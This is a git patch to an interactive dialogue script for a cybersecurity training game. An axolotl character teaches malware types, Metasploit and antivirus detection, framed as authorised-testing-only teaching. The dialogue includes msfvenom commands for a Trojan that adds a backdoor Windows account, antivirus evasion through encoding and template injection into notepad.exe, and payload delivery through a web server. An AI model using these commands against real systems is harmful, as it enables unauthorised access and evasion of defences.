From 2cce9e245e7f24524536945dabcc01966ffc9bfd Mon Sep 17 00:00:00 2001 From: "Z. Cliffe Schreuders" Date: Wed, 19 Nov 2025 18:24:26 +0000 Subject: [PATCH] feat: Update malware_metasploit.ink for game narrative - convert to Haxolottle dialogue --- .../ink/game_scenarios/malware_metasploit.ink | 502 +++++++----------- 1 file changed, 200 insertions(+), 302 deletions(-) diff --git a/story_design/ink/game_scenarios/malware_metasploit.ink b/story_design/ink/game_scenarios/malware_metasploit.ink index 48813b3..01759af 100644 --- a/story_design/ink/game_scenarios/malware_metasploit.ink +++ b/story_design/ink/game_scenarios/malware_metasploit.ink @@ -1,165 +1,139 @@ -// =========================================== -// MALWARE AND METASPLOIT LAB -// Introduction to Malware and Payloads -// =========================================== -// Game-Based Learning replacement for lab sheet -// Original: introducing_attacks/2_malware_msf_payloads.md -// =========================================== +// Malware and Metasploit - Game Scenario Version +// Based on HacktivityLabSheets: introducing_attacks/2_malware_msf_payloads.md +// License: CC BY-SA 4.0 // Global persistent state -VAR instructor_rapport = 0 -VAR ethical_awareness = 0 +VAR haxolottle_rapport = 0 // External variables EXTERNAL player_name -// =========================================== -// ENTRY POINT -// =========================================== - === start === -Malware Specialist: Welcome to Malware Analysis and Metasploit Fundamentals, Agent {player_name}. +Haxolottle: {player_name}, want to learn about malware and payloads? -Malware Specialist: This lab covers malicious software - what it is, how it works, and how to create and analyze it in controlled environments. +~ haxolottle_rapport = 0 -Malware Specialist: Before we begin, ethical boundaries reminder: everything we cover is for authorized penetration testing and security research. Creating or deploying malware against systems you don't have explicit permission to test is illegal. +Haxolottle: Before we start, little axolotl - important ethical note: this is for authorized security testing only. + +Haxolottle: Creating or deploying malware against systems without explicit permission is illegal. Always have authorization. * [Understood - authorized testing only] - ~ ethical_awareness += 15 You: Clear. Authorized environments, defensive purpose, professional responsibility. - Malware Specialist: Excellent. Let's proceed. + Haxolottle: Good. Let's dive in. -> malware_hub -* [I understand the constraints] - ~ ethical_awareness += 5 +* [I understand] You: I understand the ethical boundaries. - Malware Specialist: Good. Keep that in mind throughout. + Haxolottle: Keep that in mind. Okay, what would you like to know? -> malware_hub -// =========================================== -// MAIN HUB -// =========================================== - === malware_hub === -Malware Specialist: What aspect of malware and Metasploit would you like to explore? +Haxolottle: What would you like to know about? -+ [Types of malware and classifications] ++ [Types of malware] -> malware_types -+ [Introduction to Metasploit Framework] ++ [Metasploit Framework] -> metasploit_intro + [Creating payloads with msfvenom] -> msfvenom_basics -+ [Anti-malware detection methods] ++ [Anti-malware detection] -> antimalware_detection -+ [Evasion techniques and polymorphic malware] ++ [Evasion techniques] -> evasion_techniques + [Remote Access Trojans (RATs)] -> rat_intro -+ [Show me the commands reference] ++ [Show me commands] -> commands_reference -+ [Practical challenge tips] - -> challenge_tips -+ [I'm ready for the lab exercises] - -> ready_for_practice -+ [That's all for now] ++ [I'm good for now] #exit_conversation -> END -// =========================================== -// MALWARE TYPES -// =========================================== - === malware_types === -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Malware Specialist: Malware - malicious software. Programs designed to carry out harmful actions. +Haxolottle: Malware - malicious software. Programs designed to do harmful things. -Malware Specialist: Microsoft's old TechNet essay put it well: "If a bad guy can persuade you to run his program on your computer, it's not your computer anymore." +Haxolottle: Old Microsoft TechNet essay said it well: "If a bad guy can persuade you to run his program on your computer, it's not your computer anymore." -Malware Specialist: That's the core threat. A program running on your system has access to everything you have access to. If it runs as admin/root, even worse. +Haxolottle: That's the core threat, little axolotl. A program running on your system has access to everything you do. If it runs as admin or root, even worse. * [What are the main types?] You: How is malware classified? -> malware_taxonomy * [Why target Windows most?] You: Why is Windows the primary target? - Malware Specialist: Market share. Windows dominates desktop OS usage. More targets means more potential victims. - Malware Specialist: Though macOS, Linux, Android, iOS all have malware too. Platform diversity is shifting the landscape. - Malware Specialist: Also, each Windows version adds security mitigations. We test on Windows 7 in labs because its mitigations are well-understood and bypassable for learning purposes. - ~ instructor_rapport += 5 + Haxolottle: Market share. Windows dominates desktop usage. More targets, more potential victims. + Haxolottle: Though macOS, Linux, Android, iOS all have malware too. Platform diversity is changing things. + Haxolottle: Windows 7 is often used for learning because its security mitigations are well-understood and bypassable for educational purposes. + ~ haxolottle_rapport += 5 -> malware_types -* [Understood] +* [Got it] -> malware_hub === malware_taxonomy === -~ instructor_rapport += 8 +~ haxolottle_rapport += 8 -Malware Specialist: Main classifications: +Haxolottle: Here are the main types: -Malware Specialist: **Trojans** - malicious software posing as legitimate. Named after the Greek myth. A "game" that's actually a backdoor. +Haxolottle: **Trojans** - malicious software posing as legitimate. Named after the Greek myth. Like a "game" that's actually a backdoor. - Doesn't self-propagate - May provide remote access (RAT - Remote Access Trojan) - May spy on users (spyware, keyloggers) - May force advertising (adware) -Malware Specialist: **Viruses** - automatically spread to other programs on the same system. Infect executables, documents, boot sectors. +Haxolottle: **Viruses** - automatically spread to other programs on the same system. Infect executables, documents, boot sectors. -Malware Specialist: **Worms** - automatically spread to other computers on the network. Self-propagating across systems via exploits, email, etc. +Haxolottle: **Worms** - automatically spread to other computers on the network. Self-propagating via exploits, email, etc. -Malware Specialist: **Rootkits** - hide the presence of infection. Manipulate OS to conceal malicious processes, files, network connections. +Haxolottle: **Rootkits** - hide the infection. Manipulate the OS to conceal malicious processes, files, network connections. -Malware Specialist: **Zombies/Botnets** - infected systems receiving remote commands. Collections form botnets for DDoS, spam, crypto mining. +Haxolottle: **Zombies/Botnets** - infected systems receiving remote commands. Collections form botnets for DDoS, spam, crypto mining. -Malware Specialist: **Ransomware** - encrypts victim files, demands payment for decryption keys. Often uses cryptocurrency for anonymity. +Haxolottle: **Ransomware** - encrypts victim files, demands payment for decryption keys. Often uses cryptocurrency for anonymity. * [Tell me more about Trojans] - You: Trojans seem most relevant to this lab? - Malware Specialist: Correct. We'll focus on creating Trojan horses - programs that appear innocent but perform malicious actions. - Malware Specialist: Social engineering is key. Convince victim to run it. No exploitation required if they willingly execute it. - ~ instructor_rapport += 8 + You: Trojans seem most relevant? + Haxolottle: Yeah. Trojans are programs that appear innocent but do malicious things. + Haxolottle: Social engineering is key. Convince the victim to run it. No exploitation required if they willingly execute it. + ~ haxolottle_rapport += 8 -> malware_hub -* [How do these overlap?] - You: Can malware be multiple types? - Malware Specialist: Absolutely. A Trojan worm that installs a rootkit, for example. - Malware Specialist: Modern malware is often multi-stage: dropper Trojan delivers second-stage payload which installs persistent backdoor with rootkit capabilities. - Malware Specialist: Taxonomy helps us discuss and categorize, but real malware can be complex, multi-functional. - ~ instructor_rapport += 10 +* [Can malware be multiple types?] + You: Do these overlap? + Haxolottle: Absolutely. Like a Trojan worm that installs a rootkit. + Haxolottle: Modern malware is often multi-stage: dropper Trojan delivers second-stage payload which installs persistent backdoor with rootkit capabilities. + Haxolottle: The taxonomy helps us talk about it, but real malware can be complex and multi-functional. + ~ haxolottle_rapport += 10 -> malware_hub * [Got it] -> malware_hub -// =========================================== -// METASPLOIT FRAMEWORK -// =========================================== - === metasploit_intro === -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Malware Specialist: Metasploit Framework - one of the most powerful penetration testing tools available. +Haxolottle: Metasploit Framework - one of the most powerful penetration testing tools out there. -Malware Specialist: Contains extensive library of exploits, payloads, auxiliary modules, and post-exploitation tools. Framework for developing custom exploits. +Haxolottle: Contains a huge library of exploits, payloads, auxiliary modules, and post-exploitation tools. It's also a framework for developing custom exploits. -Malware Specialist: Open source, maintained by Rapid7. Free framework version (what we use) and commercial Pro version with GUI. +Haxolottle: Open source, maintained by Rapid7. There's a free version and a commercial Pro version with a GUI. -Malware Specialist: We're using command-line tools - teaches you more about concepts and mechanics. +Haxolottle: Command-line tools teach you more about the actual concepts and mechanics. -* [What can Metasploit do?] +* [What can it do?] You: What's the scope of Metasploit's capabilities? - Malware Specialist: Enormous scope: + Haxolottle: Enormous scope, little axolotl: - Exploit development and execution - - Payload generation (what we're focusing on) - - Post-exploitation (once you've compromised a system) - - Auxiliary modules (scanners, sniffers, fuzzers) + - Payload generation + - Post-exploitation tools + - Auxiliary modules like scanners, sniffers, fuzzers - Evasion and anti-forensics - ~ instructor_rapport += 8 + ~ haxolottle_rapport += 8 -> metasploit_intro -* [Why is it legal to distribute?] +* [How is this legal?] You: How is this legal if it creates malware? - ~ ethical_awareness += 10 - Malware Specialist: Excellent question. Shows good critical thinking. - Malware Specialist: Metasploit is a *tool*. Hammer can build houses or break windows. The tool isn't illegal - misuse is. - Malware Specialist: Legitimate uses: penetration testing, security research, education, vulnerability assessment, red team exercises. - Malware Specialist: It's widely used by security professionals to identify weaknesses before attackers do. - ~ instructor_rapport += 15 + Haxolottle: Good question. Critical thinking! + Haxolottle: Metasploit is a *tool*. A hammer can build houses or break windows. The tool isn't illegal - misuse is. + Haxolottle: Legitimate uses: penetration testing, security research, education, vulnerability assessment, red team exercises. + Haxolottle: Security professionals use it to find weaknesses before attackers do. + ~ haxolottle_rapport += 15 -> metasploit_intro * [Tell me about payloads] You: What exactly is a payload? @@ -168,33 +142,33 @@ Malware Specialist: We're using command-line tools - teaches you more about conc -> malware_hub === payload_explanation === -~ instructor_rapport += 8 +~ haxolottle_rapport += 8 -Malware Specialist: Payload - the malicious code you want to execute on a victim's system. +Haxolottle: Payload - the malicious code you want to execute on a victim's system. -Malware Specialist: The "payload" is what the attack delivers. Exploit gets you access, payload is what you do with that access. +Haxolottle: The "payload" is what the attack delivers. Exploit gets you access, payload is what you do with that access. -Malware Specialist: Metasploit has hundreds of payloads: add users, open shells, steal data, capture screenshots, log keystrokes, establish persistent access. +Haxolottle: Metasploit has hundreds of payloads: add users, open shells, steal data, capture screenshots, log keystrokes, establish persistent access. -Malware Specialist: msfvenom is the tool for generating standalone payloads - creates executable files containing the payload code. +Haxolottle: msfvenom is the tool for generating standalone payloads - creates executable files containing the payload code. * [How do I see available payloads?] You: How many payloads exist? - Malware Specialist: `msfvenom -l payloads | less` lists them all. Hundreds. - Malware Specialist: Platform-specific: windows, linux, osx, android, etc. - Malware Specialist: Various functions: shells, meterpreter, exec commands, VNC, etc. - Malware Specialist: Each has configurable options for IP addresses, ports, usernames, etc. - ~ instructor_rapport += 5 + Haxolottle: `msfvenom -l payloads | less` lists them all. Hundreds. + Haxolottle: Platform-specific: windows, linux, osx, android, etc. + Haxolottle: Various functions: shells, meterpreter, exec commands, VNC, etc. + Haxolottle: Each has configurable options for IP addresses, ports, usernames, etc. + ~ haxolottle_rapport += 5 -> payload_explanation * [What's the simplest payload?] You: What's a basic example? - Malware Specialist: `windows/adduser` - simply adds a user account to Windows. - Malware Specialist: Configuration: USER= (username), PASS= (password) - Malware Specialist: Generate: `msfvenom -p windows/adduser USER=hacker PASS=P@ssw0rd123 -f exe > trojan.exe` - Malware Specialist: Victim runs trojan.exe, new admin account created. Simple, effective Trojan. - ~ instructor_rapport += 5 + Haxolottle: `windows/adduser` - simply adds a user account to Windows. + Haxolottle: Configuration: USER= (username), PASS= (password) + Haxolottle: Generate: `msfvenom -p windows/adduser USER=hacker PASS=P@ssw0rd123 -f exe > trojan.exe` + Haxolottle: Victim runs trojan.exe, new admin account created. Simple, effective Trojan. + ~ haxolottle_rapport += 5 -> payload_explanation -* [Understood] +* [Got it] -> metasploit_intro // =========================================== @@ -202,13 +176,13 @@ Malware Specialist: msfvenom is the tool for generating standalone payloads - cr // =========================================== === msfvenom_basics === -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Malware Specialist: msfvenom - Metasploit's payload generator. Combines old msfpayload and msfencode functionality. +Haxolottle: msfvenom - Metasploit's payload generator. Combines old msfpayload and msfencode functionality. -Malware Specialist: Generates standalone payloads in various formats: executables, shellcode, scripts, etc. +Haxolottle: Generates standalone payloads in various formats: executables, shellcode, scripts, etc. -Malware Specialist: Basic workflow: +Haxolottle: Basic workflow: 1. Choose payload 2. Configure options 3. Select output format @@ -219,63 +193,63 @@ Malware Specialist: Basic workflow: -> trojan_creation_walkthrough * [What output formats exist?] You: What formats can msfvenom generate? - Malware Specialist: `msfvenom -l formats` lists them all. - Malware Specialist: Common formats: + Haxolottle: `msfvenom -l formats` lists them all. + Haxolottle: Common formats: - exe: Windows executable - elf: Linux executable - dll: Windows library - python, ruby, perl: Scripts in various languages - c, java: Source code - raw: Raw shellcode - Malware Specialist: Choose format based on target platform and delivery method. - ~ instructor_rapport += 8 + Haxolottle: Choose format based on target platform and delivery method. + ~ haxolottle_rapport += 8 -> msfvenom_basics * [How do I configure payloads?] You: What about payload options? - Malware Specialist: `msfvenom -p payload_name --list-options` shows available options. - Malware Specialist: Common options: LHOST (attacker IP), LPORT (attacker port), RHOST (target IP), USER, PASS, etc. - Malware Specialist: Set with KEY=value syntax: `msfvenom -p windows/adduser USER=bob PASS=secret123` - ~ instructor_rapport += 5 + Haxolottle: `msfvenom -p payload_name --list-options` shows available options. + Haxolottle: Common options: LHOST (attacker IP), LPORT (attacker port), RHOST (target IP), USER, PASS, etc. + Haxolottle: Set with KEY=value syntax: `msfvenom -p windows/adduser USER=bob PASS=secret123` + ~ haxolottle_rapport += 5 -> msfvenom_basics * [Back to main menu] -> malware_hub === trojan_creation_walkthrough === -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 -Malware Specialist: Complete Trojan creation example: +Haxolottle: Complete Trojan creation example: -Malware Specialist: **Step 1:** Choose payload +Haxolottle: **Step 1:** Choose payload `msfvenom -l payloads | grep windows/adduser` -Malware Specialist: **Step 2:** Check options +Haxolottle: **Step 2:** Check options `msfvenom -p windows/adduser --list-options` -Malware Specialist: **Step 3:** Generate executable +Haxolottle: **Step 3:** Generate executable `msfvenom -p windows/adduser USER=backdoor PASS=SecurePass123 -f exe > game.exe` -Malware Specialist: **Step 4:** Deliver to victim (in lab: web server) +Haxolottle: **Step 4:** Deliver to victim (could use web server) `sudo cp game.exe /var/www/html/share/` `sudo service apache2 start` -Malware Specialist: **Step 5:** Victim downloads and runs game.exe +Haxolottle: **Step 5:** Victim downloads and runs game.exe (Social engineering: "Free game! Click to play!") -Malware Specialist: **Step 6:** Verify success +Haxolottle: **Step 6:** Verify success On victim system: `net user` shows new backdoor account -Malware Specialist: That's the basic flow. Simple but effective if victim trusts you enough to run the file. +Haxolottle: That's the basic flow. Simple but effective if victim trusts you enough to run the file. * [How do I make it less suspicious?] You: How do I make it seem legitimate? - Malware Specialist: Several techniques: icon changing, using templates, binding to legitimate programs, adding decoy functionality. - Malware Specialist: We'll cover evasion techniques separately. Short answer: embed payload in real program so it both executes malware AND runs expected functionality. - ~ instructor_rapport += 10 + Haxolottle: Several techniques: icon changing, using templates, binding to legitimate programs, adding decoy functionality. + Haxolottle: We'll cover evasion techniques separately. Short answer: embed payload in real program so it both executes malware AND runs expected functionality. + ~ haxolottle_rapport += 10 -> msfvenom_basics * [What about detection?] You: Won't anti-malware catch this? - Malware Specialist: Basic msfvenom payloads with default settings? Absolutely detected by modern anti-malware. - Malware Specialist: That's why we need evasion techniques - encoding, obfuscation, template injection. + Haxolottle: Basic msfvenom payloads with default settings? Absolutely detected by modern anti-malware. + Haxolottle: That's why we need evasion techniques - encoding, obfuscation, template injection. -> antimalware_detection * [Clear walkthrough] -> msfvenom_basics @@ -285,11 +259,11 @@ Malware Specialist: That's the basic flow. Simple but effective if victim trusts // =========================================== === antimalware_detection === -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Malware Specialist: Anti-malware software - defensive tools attempting to detect and block malicious software. +Haxolottle: Anti-malware software - defensive tools attempting to detect and block malicious software. -Malware Specialist: Two main detection approaches: signature-based and anomaly-based. +Haxolottle: Two main detection approaches: signature-based and anomaly-based. * [Explain signature-based detection] You: How does signature-based detection work? @@ -299,69 +273,69 @@ Malware Specialist: Two main detection approaches: signature-based and anomaly-b -> anomaly_based * [How do I test against anti-malware?] You: How can I test my payloads? - Malware Specialist: ClamAV - open-source anti-malware scanner. - Malware Specialist: `clamscan` scans current directory for malware. - Malware Specialist: Basic msfvenom payloads get detected immediately. Tells you if your evasion worked. - Malware Specialist: VirusTotal.com tests against 50+ scanners - but uploading shares your malware with vendors. Good for testing, bad for operational security. - ~ instructor_rapport += 8 + Haxolottle: ClamAV - open-source anti-malware scanner. + Haxolottle: `clamscan` scans current directory for malware. + Haxolottle: Basic msfvenom payloads get detected immediately. Tells you if your evasion worked. + Haxolottle: VirusTotal.com tests against 50+ scanners - but uploading shares your malware with vendors. Good for testing, bad for operational security. + ~ haxolottle_rapport += 8 -> antimalware_detection * [Back to main menu] -> malware_hub === signature_based === -~ instructor_rapport += 8 +~ haxolottle_rapport += 8 -Malware Specialist: Signature-based detection - blacklist of known malware patterns. +Haxolottle: Signature-based detection - blacklist of known malware patterns. -Malware Specialist: **How it works:** +Haxolottle: **How it works:** - Malware researchers analyze malicious code - Extract unique signatures (byte patterns, hashes, code structures) - Add to signature database - Scanner compares files against database -Malware Specialist: **Advantages:** +Haxolottle: **Advantages:** - High accuracy for known threats - Low false positive rate - Resource efficient - Mature, well-understood technology -Malware Specialist: **Disadvantages:** +Haxolottle: **Disadvantages:** - Useless against unknown malware (zero-days) - Requires constant signature updates - Polymorphic malware can evade (same function, different code) - Always reactive, never proactive * [How do hashes relate to signatures?] - ~ instructor_rapport += 10 + ~ haxolottle_rapport += 10 You: You mentioned hashes earlier? - Malware Specialist: Simple signature approach: hash the entire malware file. - Malware Specialist: `sha256sum malware.exe` produces unique fingerprint. - Malware Specialist: Change one byte? Completely different hash. That's the evasion opportunity. - Malware Specialist: Re-encode payload → different file → different hash → evades hash-based detection. - Malware Specialist: Modern scanners use more sophisticated signatures than simple hashes, but principle remains. - ~ instructor_rapport += 10 + Haxolottle: Simple signature approach: hash the entire malware file. + Haxolottle: `sha256sum malware.exe` produces unique fingerprint. + Haxolottle: Change one byte? Completely different hash. That's the evasion opportunity. + Haxolottle: Re-encode payload → different file → different hash → evades hash-based detection. + Haxolottle: Modern scanners use more sophisticated signatures than simple hashes, but principle remains. + ~ haxolottle_rapport += 10 -> signature_based * [Understood] -> antimalware_detection === anomaly_based === -~ instructor_rapport += 8 +~ haxolottle_rapport += 8 -Malware Specialist: Anomaly-based detection - identifies malicious behavior rather than known signatures. +Haxolottle: Anomaly-based detection - identifies malicious behavior rather than known signatures. -Malware Specialist: **How it works:** +Haxolottle: **How it works:** - Establish baseline of normal system behavior - Monitor processes, registry changes, network connections, file access - Flag deviations from normal as potentially malicious - May use machine learning, heuristics, behavioral analysis -Malware Specialist: **Advantages:** +Haxolottle: **Advantages:** - Detects unknown threats (zero-days) - Adapts to new attack methods - More comprehensive than signature matching - Less dependent on frequent updates -Malware Specialist: **Disadvantages:** +Haxolottle: **Disadvantages:** - False positives (legitimate software flagged) - Complex implementation and tuning - Resource intensive (continuous monitoring) @@ -369,23 +343,23 @@ Malware Specialist: **Disadvantages:** * [Give me an example] You: What behaviors trigger anomaly detection? - Malware Specialist: Suspicious patterns: + Haxolottle: Suspicious patterns: - Process creating multiple network connections - Modification of system files - Injection into other processes - Encryption of large numbers of files (ransomware behavior) - Keylogging-like keyboard hooks - Persistence mechanisms (registry keys, startup folders) - Malware Specialist: Problem: legitimate software sometimes does these things too. Anti-cheat software for games triggers false positives constantly. - ~ instructor_rapport += 10 + Haxolottle: Problem: legitimate software sometimes does these things too. Anti-cheat software for games triggers false positives constantly. + ~ haxolottle_rapport += 10 -> anomaly_based * [Which is better?] You: Which detection method is superior? - Malware Specialist: Both. Modern anti-malware uses layered approach. - Malware Specialist: Signature-based catches known threats efficiently. Anomaly-based catches unknowns. - Malware Specialist: Add heuristics, sandboxing, reputation scoring, machine learning - defense in depth. - Malware Specialist: No single method is perfect. Combine multiple for better coverage. - ~ instructor_rapport += 10 + Haxolottle: Both. Modern anti-malware uses layered approach. + Haxolottle: Signature-based catches known threats efficiently. Anomaly-based catches unknowns. + Haxolottle: Add heuristics, sandboxing, reputation scoring, machine learning - defense in depth. + Haxolottle: No single method is perfect. Combine multiple for better coverage. + ~ haxolottle_rapport += 10 -> anomaly_based * [Got it] -> antimalware_detection @@ -395,13 +369,13 @@ Malware Specialist: **Disadvantages:** // =========================================== === evasion_techniques === -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Malware Specialist: Evasion - making malware undetectable to anti-malware scanners. +Haxolottle: Evasion - making malware undetectable to anti-malware scanners. -Malware Specialist: Key techniques: encoding, obfuscation, template injection, packing, encryption. +Haxolottle: Key techniques: encoding, obfuscation, template injection, packing, encryption. -Malware Specialist: Goal: change how malware looks without changing what it does. +Haxolottle: Goal: change how malware looks without changing what it does. * [Explain encoding] You: How does encoding help evasion? @@ -411,86 +385,86 @@ Malware Specialist: Goal: change how malware looks without changing what it does -> template_injection * [What's polymorphic malware?] You: You mentioned polymorphic malware earlier? - Malware Specialist: Polymorphic malware - changes its appearance while maintaining functionality. - Malware Specialist: Stores payload in encoded/encrypted form. Includes decoder stub that unpacks it at runtime. - Malware Specialist: Each iteration looks different (different encoding, different decryptor), but does the same thing. - Malware Specialist: This is what msfvenom encoders create - polymorphic payloads. - ~ instructor_rapport += 10 + Haxolottle: Polymorphic malware - changes its appearance while maintaining functionality. + Haxolottle: Stores payload in encoded/encrypted form. Includes decoder stub that unpacks it at runtime. + Haxolottle: Each iteration looks different (different encoding, different decryptor), but does the same thing. + Haxolottle: This is what msfvenom encoders create - polymorphic payloads. + ~ haxolottle_rapport += 10 -> evasion_techniques * [Back to main menu] -> malware_hub === encoding_evasion === -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 -Malware Specialist: Encoding for evasion - re-encode payload so file looks different but executes identically. +Haxolottle: Encoding for evasion - re-encode payload so file looks different but executes identically. -Malware Specialist: msfvenom supports multiple encoders. View list: `msfvenom -l encoders` +Haxolottle: msfvenom supports multiple encoders. View list: `msfvenom -l encoders` -Malware Specialist: Common encoder: shikata_ga_nai (Japanese for "it can't be helped" - popular polymorphic encoder) +Haxolottle: Common encoder: shikata_ga_nai (Japanese for "it can't be helped" - popular polymorphic encoder) -Malware Specialist: Usage: +Haxolottle: Usage: `msfvenom -p windows/adduser USER=test PASS=pass123 -e x86/shikata_ga_nai -i 10 -f exe > encoded.exe` -Malware Specialist: `-e` specifies encoder, `-i` specifies iterations (encode 10 times) +Haxolottle: `-e` specifies encoder, `-i` specifies iterations (encode 10 times) * [Does more encoding help?] You: Is 10 iterations better than 1? - Malware Specialist: Diminishing returns. More iterations makes different file, but modern scanners analyze behavior, not just signatures. - Malware Specialist: Encoding helps evade simple hash/signature checks. Won't help against heuristic or behavioral analysis. - Malware Specialist: 5-10 iterations often sufficient for signature evasion. Beyond that, template injection more effective. - ~ instructor_rapport += 8 + Haxolottle: Diminishing returns. More iterations makes different file, but modern scanners analyze behavior, not just signatures. + Haxolottle: Encoding helps evade simple hash/signature checks. Won't help against heuristic or behavioral analysis. + Haxolottle: 5-10 iterations often sufficient for signature evasion. Beyond that, template injection more effective. + ~ haxolottle_rapport += 8 -> encoding_evasion * [Can I chain encoders?] You: Can I use multiple different encoders? - Malware Specialist: Absolutely. Pipe msfvenom outputs: + Haxolottle: Absolutely. Pipe msfvenom outputs: `msfvenom -p payload -e encoder1 -i 3 | msfvenom -e encoder2 -i 5 -f exe > multi_encoded.exe` - Malware Specialist: Each encoder transforms output differently. Chaining increases obfuscation. - Malware Specialist: Though again, modern AV looks deeper than surface encoding. - ~ instructor_rapport += 10 + Haxolottle: Each encoder transforms output differently. Chaining increases obfuscation. + Haxolottle: Though again, modern AV looks deeper than surface encoding. + ~ haxolottle_rapport += 10 -> encoding_evasion * [Understood] -> evasion_techniques === template_injection === -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 -Malware Specialist: Template injection - embedding payload inside legitimate executable. +Haxolottle: Template injection - embedding payload inside legitimate executable. -Malware Specialist: Makes malware look like real software. Both malicious code AND original program execute. +Haxolottle: Makes malware look like real software. Both malicious code AND original program execute. -Malware Specialist: msfvenom `-x` flag specifies template executable: +Haxolottle: msfvenom `-x` flag specifies template executable: `msfvenom -p windows/exec CMD='net user /add hacker pass123' -x notepad.exe -f exe > my_notepad.exe` -Malware Specialist: Result: executable that opens Notepad (seems normal) while also adding user account (malicious). +Haxolottle: Result: executable that opens Notepad (seems normal) while also adding user account (malicious). * [Why is this effective?] You: How does this evade detection? - Malware Specialist: Several reasons: + Haxolottle: Several reasons: - File structure resembles legitimate program - Contains real code from original program - Signature scanners see legitimate program signatures too - Behavioral analysis sees expected behavior (Notepad opens) alongside malicious - Malware Specialist: Not perfect, but more effective than bare encoded payload. - ~ instructor_rapport += 10 + Haxolottle: Not perfect, but more effective than bare encoded payload. + ~ haxolottle_rapport += 10 -> template_injection * [What programs make good templates?] You: Which programs should I use as templates? - Malware Specialist: Context-dependent. Match victim's expectations: + Haxolottle: Context-dependent. Match victim's expectations: - Games for game-focused social engineering - Utilities (calc.exe, notepad.exe) for general purpose - Industry-specific software for targeted attacks - Malware Specialist: Smaller files better (less suspicious download size). - Malware Specialist: Legitimate signed programs add credibility. - ~ instructor_rapport += 8 + Haxolottle: Smaller files better (less suspicious download size). + Haxolottle: Legitimate signed programs add credibility. + ~ haxolottle_rapport += 8 -> template_injection * [Can I combine encoding and templates?] You: Can I use both techniques together? - Malware Specialist: Absolutely recommended. Encode first, then inject into template: + Haxolottle: Absolutely recommended. Encode first, then inject into template: `msfvenom -p payload -e encoder -i 7 | msfvenom -x template.exe -f exe > output.exe` - Malware Specialist: Layered evasion: encoding changes signature, template adds legitimacy. - Malware Specialist: In practice: well-encoded, template-injected payloads evade many scanners. - ~ instructor_rapport += 10 + Haxolottle: Layered evasion: encoding changes signature, template adds legitimacy. + Haxolottle: In practice: well-encoded, template-injected payloads evade many scanners. + ~ haxolottle_rapport += 10 -> template_injection * [Got it] -> evasion_techniques @@ -500,40 +474,40 @@ Malware Specialist: Result: executable that opens Notepad (seems normal) while a // =========================================== === rat_intro === -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Malware Specialist: Remote Access Trojans (RATs) - malware providing attacker with remote control of victim system. +Haxolottle: Remote Access Trojans (RATs) - malware providing attacker with remote control of victim system. -Malware Specialist: Classic architecture: client-server model. +Haxolottle: Classic architecture: client-server model. - Server (victim runs this): listens for connections, executes commands - Client (attacker uses this): connects to server, sends commands -Malware Specialist: RAT capabilities typically include: remote shell, file transfer, screenshot capture, keylogging, webcam access, process manipulation. +Haxolottle: RAT capabilities typically include: remote shell, file transfer, screenshot capture, keylogging, webcam access, process manipulation. * [How do RATs differ from what we've done?] You: How is this different from adduser payload? - Malware Specialist: adduser is single-action. Runs once, adds user, exits. - Malware Specialist: RAT provides persistent, interactive access. Attacker can issue multiple commands over time. - Malware Specialist: More powerful, more flexible, more risk if detected. - ~ instructor_rapport += 8 + Haxolottle: adduser is single-action. Runs once, adds user, exits. + Haxolottle: RAT provides persistent, interactive access. Attacker can issue multiple commands over time. + Haxolottle: More powerful, more flexible, more risk if detected. + ~ haxolottle_rapport += 8 -> rat_intro * [What Metasploit payloads create RATs?] You: Which payloads provide remote access? - Malware Specialist: Several options: + Haxolottle: Several options: - windows/meterpreter/reverse_tcp - full-featured RAT - windows/shell/reverse_tcp - simple command shell - windows/vnc/reverse_tcp - graphical remote access - Malware Specialist: Meterpreter is most powerful - extensive post-exploitation features. - Malware Specialist: Reverse shells covered in later labs. Advanced topic. - ~ instructor_rapport += 8 + Haxolottle: Meterpreter is most powerful - extensive post-exploitation features. + Haxolottle: Reverse shells covered in later labs. Advanced topic. + ~ haxolottle_rapport += 8 -> rat_intro * [Why "reverse"?] You: What does "reverse" mean in reverse_tcp? - Malware Specialist: Normal: attacker connects TO victim (requires open port on victim, often firewalled). - Malware Specialist: Reverse: victim connects TO attacker (outbound connections usually allowed). - Malware Specialist: Victim initiates connection, attacker listens. Bypasses most firewalls. - Malware Specialist: Essential technique for real-world scenarios where victims are behind NAT/firewalls. - ~ instructor_rapport += 10 + Haxolottle: Normal: attacker connects TO victim (requires open port on victim, often firewalled). + Haxolottle: Reverse: victim connects TO attacker (outbound connections usually allowed). + Haxolottle: Victim initiates connection, attacker listens. Bypasses most firewalls. + Haxolottle: Essential technique for real-world scenarios where victims are behind NAT/firewalls. + ~ haxolottle_rapport += 10 -> rat_intro * [Understood] -> malware_hub @@ -543,112 +517,36 @@ Malware Specialist: RAT capabilities typically include: remote shell, file trans // =========================================== === commands_reference === -Malware Specialist: Quick reference for Metasploit and malware-related commands: +Haxolottle: Quick reference for Metasploit and malware-related commands: -Malware Specialist: **msfvenom basics:** +Haxolottle: **msfvenom basics:** - List payloads: `msfvenom -l payloads` - List encoders: `msfvenom -l encoders` - List formats: `msfvenom -l formats` - Show options: `msfvenom -p payload_name --list-options` -Malware Specialist: **Creating payloads:** +Haxolottle: **Creating payloads:** - Basic: `msfvenom -p windows/adduser USER=name PASS=pass -f exe > trojan.exe` - Encoded: `msfvenom -p payload -e x86/shikata_ga_nai -i 10 -f exe > output.exe` - With template: `msfvenom -p payload -x template.exe -f exe > output.exe` - Combined: `msfvenom -p payload -e encoder -i 5 | msfvenom -x template.exe -f exe > final.exe` -Malware Specialist: **Testing payloads:** +Haxolottle: **Testing payloads:** - Hash file: `sha256sum filename.exe` - Scan with ClamAV: `clamscan` - Scan specific file: `clamscan filename.exe` -Malware Specialist: **Web server (payload delivery):** +Haxolottle: **Web server (payload delivery):** - Create share directory: `sudo mkdir /var/www/html/share` - Copy payload: `sudo cp malware.exe /var/www/html/share/` - Start Apache: `sudo service apache2 start` - Access from victim: http://KALI_IP/share/malware.exe -Malware Specialist: **Windows victim verification:** +Haxolottle: **Windows victim verification:** - List users: `net user` - Check specific user: `net user username` + [Back to main menu] -> malware_hub -// =========================================== -// CHALLENGE TIPS -// =========================================== - -=== challenge_tips === 